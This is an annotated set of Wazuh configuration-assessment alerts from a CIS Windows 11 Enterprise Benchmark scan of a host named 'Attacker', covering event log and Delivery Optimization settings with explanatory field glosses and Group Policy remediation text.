data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to any value other than Enabled: Internet (3): Computer Configuration\Policies\Administrative Templates\Windows Components\Delivery Optimization\Download Mode. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template DeliveryOptimization.admx/adml that is included with the Microsoft Windows 10 RTM (Release 1507) Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.18.1 CIS benchmark recommendation number inside data.sca.policy – open that section for the full audit and remediation text.
data.sca.check.compliance.cis_csc: 7.3 CIS Critical Security Controls v8 safeguard mapping (7.3 – Perform Automated Operating System Patch Management).
data.sca.check.compliance.pci_dss: 6.2 PCI DSS requirement mapping (6.2 – install vendor-supplied security patches).
data.sca.check.compliance.nist_800_53: SI.2,SA.11,SI.4 NIST SP 800-53 control mapping (SI-2 Flaw Remediation, SA-11 Developer Testing and Evaluation, SI-4 System Monitoring).
data.sca.check.compliance.gpg_13: 4.3 UK NCSC Good Practice Guide 13 (Protective Monitoring) control mapping.
data.sca.check.compliance.gdpr_IV: 35.7.d GDPR Chapter IV mapping (Art. 35(7)(d) – DPIA measures to address the identified risks).
data.sca.check.compliance.hipaa: 164.312.b HIPAA Security Rule mapping (§164.312(b) – audit controls).
data.sca.check.compliance.tsc: A1.2,CC6.8 SOC 2 Trust Services Criteria mapping (availability; prevention and detection of unauthorized software).
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\DeliveryOptimization'] Registry key(s) the check read; if the key is absent the policy was never applied and the OS default is in effect.
data.sca.check.result: not applicable The third result besides passed and failed: the check could not evaluate its target. Do not read it as a pass – see data.sca.check.reason.
data.sca.check.reason: Unable to read registry 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\DeliveryOptimization' (The system cannot find the file specified. ) Why the result is not applicable. Here the DeliveryOptimization policy key does not exist, so no Download Mode policy is set and the OS default applies. Per the check description that default is 3 (Internet) on every SKU except Enterprise, Enterprise LTSB and Education – the very state the check warns against – so unless this host is one of those SKUs, treat this as a finding and set the policy.
location: sca Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Security: Control Event Log behavior when the log file reaches its maximum size' is set to 'Disabled'.
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Security: Control Event Log behavior when the log file reaches its maximum size' is set to 'Disabled'.
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Security: Control Event Log behavior when the log file reaches its maximum size' is set to 'Disabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19008 Numeric ID of the detection rule that fired.
rule.firedtimes: 3 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1', 'AU.6'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.27.2.1'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['8.3'] CIS Critical Security Controls v8 safeguard mapping (8.3 – Ensure Adequate Audit Log Storage).
rule.gpg13: ['4.12'] UK NCSC Good Practice Guide 13 (Protective Monitoring) control mapping. Spelled gpg_13 on some rules; same mapping.
rule.gdpr_IV: ['35.7.d'] GDPR Chapter IV mapping (Art. 35(7)(d) – DPIA measures to address the identified risks); the same mapping as rule.gdpr in a second notation.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2563077 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check SCA event type – check (one benchmark check) or summary (totals for the run). Not the scan engine; see data.sca.check.* for what was inspected.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26305 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Security: Control Event Log behavior when the log file reaches its maximum size' is set to 'Disabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting controls Event Log behavior when the log file reaches its maximum size. The recommended state for this setting is: Disabled. Note: Old events may or may not be retained according to the Backup log automatically when full policy setting. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: If new events are not recorded it may be difficult or impossible to determine the root cause of system problems or the unauthorized activities of malicious users. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Event Log Service\Security\Control Event Log behavior when the log file reaches its maximum size. Note: This Group Policy path is provided by the Group Policy template EventLog.admx/adml that is included with all versions of the Microsoft Windows Administrative Templates. Note #2: In older Microsoft Windows Administrative Templates, this setting was initially named Retain old events, but it was renamed starting with the Windows 8.0 & Server 2012 (non-R2) Administrative Templates. Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.27.2.1 CIS benchmark recommendation number inside data.sca.policy – open that section for the full audit and remediation text.
data.sca.check.compliance.cis_csc: 8.3 CIS Critical Security Controls v8 safeguard mapping (8.3 – Ensure Adequate Audit Log Storage).
data.sca.check.compliance.pci_dss: 10.6.1 PCI DSS requirement mapping (10.6.1 – review security events and logs of critical system components daily).
data.sca.check.compliance.nist_800_53: AU.6 NIST SP 800-53 control mapping (AU-6 – Audit Record Review, Analysis, and Reporting).
data.sca.check.compliance.gpg13: 4.12 UK NCSC Good Practice Guide 13 (Protective Monitoring) control mapping.
data.sca.check.compliance.gdpr_IV: 35.7.d GDPR Chapter IV mapping (Art. 35(7)(d) – DPIA measures to address the identified risks).
data.sca.check.compliance.hipaa: 164.312.b HIPAA Security Rule mapping (§164.312(b) – audit controls).
data.sca.check.compliance.tsc: CC6.1,CC6.8,CC7.2,CC7.3 SOC 2 Trust Services Criteria mapping (logical access, unauthorized software, monitoring, evaluation of security events).
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\EventLog\\Security'] Registry key(s) the check read; if the key is absent the policy was never applied and the OS default is in effect.
data.sca.check.result: passed passed, failed or not applicable. This one is compliant – no action needed, but keep it in the report as evidence.
location: sca Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Security: Specify the maximum log file size (KB)' is set to 'Enabled: 196,608 or greater'.
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Security: Specify the maximum log file size (KB)' is set to 'Enabled: 196,608 or greater'.
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Security: Specify the maximum log file size (KB)' is set to 'Enabled: 196,608 or greater'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 23 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1', 'AU.6'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.27.2.2'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['8.3'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gpg13: ['4.12'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr_IV: ['35.7.d'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2567241 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26306 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Security: Specify the maximum log file size (KB)' is set to 'Enabled: 196,608 or greater'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting specifies the maximum size of the log file in kilobytes. The maximum log file size can be configured between 1 megabyte (1,024 kilobytes) and 4 terabytes (4,194,240 kilobytes) in kilobyte increments. The recommended state for this setting is: Enabled: 196,608 or greater. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: If events are not recorded it may be difficult or impossible to determine the root cause of system problems or the unauthorized activities of malicious users. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: 196,608 or greater: Computer Configuration\Policies\Administrative Templates\Windows Components\Event Log Service\Security\Specify the maximum log file size (KB). Note: This Group Policy path is provided by the Group Policy template EventLog.admx/adml that is included with all versions of the Microsoft Windows Administrative Templates. Note #2: In older Microsoft Windows Administrative Templates, this setting was initially named Maximum Log Size (KB), but it was renamed starting with the Windows 8.0 & Server 2012 (non-R2) Administrative Templates. Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.27.2.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 8.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.pci_dss: 10.6.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.nist_800_53: AU.6 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.gpg13: 4.12 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.gdpr_IV: 35.7.d No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.hipaa: 164.312.b No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.tsc: CC6.1,CC6.8,CC7.2,CC7.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\EventLog\\Security'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Setup: Specify the maximum log file size (KB)' is set to 'Enabled: 32,768 or greater'.
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Setup: Specify the maximum log file size (KB)' is set to 'Enabled: 32,768 or greater'.
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Setup: Specify the maximum log file size (KB)' is set to 'Enabled: 32,768 or greater'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 24 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1', 'AU.6'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.27.3.2'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['8.3'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gpg13: ['4.12'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr_IV: ['35.7.d'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2571429 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26308 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Setup: Specify the maximum log file size (KB)' is set to 'Enabled: 32,768 or greater'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting specifies the maximum size of the log file in kilobytes. The maximum log file size can be configured between 1 megabyte (1,024 kilobytes) and 4 terabytes (4,194,240 kilobytes) in kilobyte increments. The recommended state for this setting is: Enabled: 32,768 or greater. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: If events are not recorded it may be difficult or impossible to determine the root cause of system problems or the unauthorized activities of malicious users. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: 32,768 or greater: Computer Configuration\Policies\Administrative Templates\Windows Components\Event Log Service\Setup\Specify the maximum log file size (KB). Note: This Group Policy path is provided by the Group Policy template EventLog.admx/adml that is included with all versions of the Microsoft Windows Administrative Templates. Note #2: In older Microsoft Windows Administrative Templates, this setting was initially named Maximum Log Size (KB), but it was renamed starting with the Windows 8.0 & Server 2012 (non-R2) Administrative Templates. Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.27.3.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 8.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.pci_dss: 10.6.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.nist_800_53: AU.6 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.gpg13: 4.12 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.gdpr_IV: 35.7.d No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.hipaa: 164.312.b No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.tsc: CC6.1,CC6.8,CC7.2,CC7.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\EventLog\\Setup'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'System: Control Event Log behavior when the log file reaches its maximum size' is set to 'Disabled'.
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'System: Control Event Log behavior when the log file reaches its maximum size' is set to 'Disabled'.
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'System: Control Event Log behavior when the log file reaches its maximum size' is set to 'Disabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19008 Numeric ID of the detection rule that fired.
rule.firedtimes: 4 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1', 'AU.6'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.27.4.1'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['8.3'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gpg13: ['4.12'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr_IV: ['35.7.d'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2575577 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26309 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'System: Control Event Log behavior when the log file reaches its maximum size' is set to 'Disabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting controls Event Log behavior when the log file reaches its maximum size. The recommended state for this setting is: Disabled. Note: Old events may or may not be retained according to the Backup log automatically when full policy setting. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: If new events are not recorded it may be difficult or impossible to determine the root cause of system problems or the unauthorized activities of malicious users. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Event Log Service\System\Control Event Log behavior when the log file reaches its maximum size. Note: This Group Policy path is provided by the Group Policy template EventLog.admx/adml that is included with all versions of the Microsoft Windows Administrative Templates. Note #2: In older Microsoft Windows Administrative Templates, this setting was initially named Retain old events, but it was renamed starting with the Windows 8.0 & Server 2012 (non-R2) Administrative Templates. Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.27.4.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 8.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.pci_dss: 10.6.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.nist_800_53: AU.6 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.gpg13: 4.12 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.gdpr_IV: 35.7.d No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.hipaa: 164.312.b No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.tsc: CC6.1,CC6.8,CC7.2,CC7.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\EventLog\\System'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: passed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'System: Specify the maximum log file size (KB)' is set to 'Enabled: 32,768 or greater'.
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'System: Specify the maximum log file size (KB)' is set to 'Enabled: 32,768 or greater'.
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'System: Specify the maximum log file size (KB)' is set to 'Enabled: 32,768 or greater'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 25 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1', 'AU.6'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.27.4.2'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['8.3'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gpg13: ['4.12'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr_IV: ['35.7.d'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2579721 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26310 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'System: Specify the maximum log file size (KB)' is set to 'Enabled: 32,768 or greater'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting specifies the maximum size of the log file in kilobytes. The maximum log file size can be configured between 1 megabyte (1,024 kilobytes) and 4 terabytes (4,194,240 kilobytes) in kilobyte increments. The recommended state for this setting is: Enabled: 32,768 or greater. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: If events are not recorded it may be difficult or impossible to determine the root cause of system problems or the unauthorized activities of malicious users. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: 32,768 or greater: Computer Configuration\Policies\Administrative Templates\Windows Components\Event Log Service\System\Specify the maximum log file size (KB). Note: This Group Policy path is provided by the Group Policy template EventLog.admx/adml that is included with all versions of the Microsoft Windows Administrative Templates. Note #2: In older Microsoft Windows Administrative Templates, this setting was initially named Maximum Log Size (KB), but it was renamed starting with the Windows 8.0 & Server 2012 (non-R2) Administrative Templates. Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.27.4.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 8.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.pci_dss: 10.6.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.nist_800_53: AU.6 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.gpg13: 4.12 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.gdpr_IV: 35.7.d No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.hipaa: 164.312.b No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.tsc: CC6.1,CC6.8,CC7.2,CC7.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\EventLog\\System'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off Data Execution Prevention for Explorer' is set to 'Disabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19008 Numeric ID of the detection rule that fired.
rule.firedtimes: 5 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1', 'AU.6'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.31.2'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['10.5'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gpg13: ['4.12'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr_IV: ['35.7.d'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2583879 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26311 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Turn off Data Execution Prevention for Explorer' is set to 'Disabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: Disabling Data Execution Prevention can allow certain legacy plug-in applications to function without terminating Explorer. The recommended state for this setting is: Disabled. Note: Some legacy plug-in applications and other software may not function with Data Execution Prevention and will require an exception to be defined for that specific plug-in/software. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Data Execution Prevention is an important security feature supported by Explorer that helps to limit the impact of certain types of malware. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\File Explorer\Turn off Data Execution Prevention for Explorer. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template Explorer.admx/adml that is included with the Microsoft Windows 7 & Server 2008 R2 Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.31.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 10.5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.pci_dss: 10.6.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.nist_800_53: AU.6 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.gpg13: 4.12 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.gdpr_IV: 35.7.d No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.hipaa: 164.312.b No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.tsc: CC6.1,CC6.8,CC7.2,CC7.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Explorer'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: passed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
